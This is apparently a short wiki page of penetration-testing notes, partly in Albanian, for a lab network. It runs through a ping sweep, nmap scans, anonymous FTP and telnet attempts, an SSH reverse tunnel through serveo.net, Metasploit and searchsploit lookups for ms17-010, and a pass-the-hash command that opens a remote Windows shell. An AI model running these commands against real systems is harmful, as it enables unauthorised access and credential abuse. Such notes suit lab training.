cyberdocs:example_scan_take-session_privilage-escalation
identify alive hosts seq 1 254 for i in $(seq 1 254); do ping -c 1 '172.16.60.'$i;done cat output.txt | grep 'bytes of data' | cut -d ' ' -f 2 nmap 172.16.60.0/24 ###1 check alived host, check top 1025 well known ports nmap -sn 172.16.60.1/24 --sn e kontrollon veq a eshte hap nmap 172.16.60.1/24 -p- -- -p- check all range ports nmap -sS -sV 172.16.1.172 -- -p5988 ### check specific port attempts on open ports found via nmap ftp try anonymous/anonymous ftp 172.16.1.19 telnet 172.16.1.19 21 telnet 172.16.1.19 pasi ke marr access ne shell ssh -R cyberacademy2018:80:localhost:80 serveo.net rtsp 554 /me vlc ne vlc network url: rtsp:172.16.1.19:554 snmp sudo msfconsole auxiliary set community filename exploit search ms17-010 windows # searchsploit "windows server 2008" # locate windows/remote/41987.py ./pth-winexe -U WOURKGROUP/user%hash //172.16.1.204 cmd ### pass the hash
cyberdocs/example_scan_take-session_privilage-escalation.txt · Last modified: 2019/02/06 14:52 by dardan